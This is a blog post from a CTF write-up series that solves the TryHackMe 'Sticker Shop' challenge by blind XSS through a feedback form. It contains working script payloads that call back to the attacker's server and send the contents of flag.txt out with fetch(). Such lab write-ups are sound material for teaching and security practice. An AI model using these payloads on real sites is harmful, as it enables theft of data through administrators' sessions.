Open in app

Sign in

Write

Sign in

TryHackMe: The Sticker Shop - Blind XSS Writeup

Naufal Ardhani
3 min readJan 21, 2025

--

The Sticker Shop is a machine in the web exploitation category, created by @toxicat0r and can be accessed for free on TryHackMe.

From the engine description “Can you exploit the sticker shop in order to capture the flag?” I thought this was a challenge like a wrate limit or mass assignment vulnerability.

Now it’s time to start the machine and look at the task 1 description, we find that the developer is hosting the web challenge on the same computer as the developer. Then we are asked to read the flags in IP:PORT/flag.txt.

Recon

When we try to access IP:PORT/flag.txt it will produce “401 Unauthorized”, this means we cannot access it because we do not have authorization.

As we can see, this is the main page. It only contains static code. There is no interaction with the server whatsoever.

And on the feedback page there is an input and submit button to send feedback to the developer (admin).

We make sure with view-source URI scheme, yes this really sends input with POST request.

Exploitation

From my experience playing CTF, challenges like this are usually Blind XSS.

I want to try with a basic payload like this:

<script>fetch('http://ip:port/is_blind?');</script>

But before that we need to know our IP on Tryhackme VPN and turn on the local server to be fetched through the machine. I use python http.server.

Find TryHackMe IP

My IP is 10.21.24.211.

And now the local server is running on port 1337 and ready to use.

<script>fetch('http://10.21.24.211:1337/is_blind?');</script>

After clicking submit we get the message “Thanks for your feedback! It will be evaluated shortly by our staff”.

and yes, this is true Blind XSS because our local server gets requests from the IP of the machine / developer.

Next, to be able to access the flag.txt, we can utilize the developer session by utilizing Blind XSS in the feedback feature.

Below is the complete script to access the flag.txt.

<script>
fetch('http://machine_ip:8080/flag.txt')
  .then(response => response.text())
  .then(flag => {
    fetch(`http://your_ip:your_port/?flag=${encodeURIComponent(flag)}`);
  })
  .catch(error => console.error('Error:', error));
</script>

Submit feedback again with the above payload and you will get the flag!

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

--

--

Naufal Ardhani
Naufal Ardhani

Written by Naufal Ardhani

82 Followers
28 Following

Offensive Security | Penetration Tester | CTF Player 🇮🇩

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams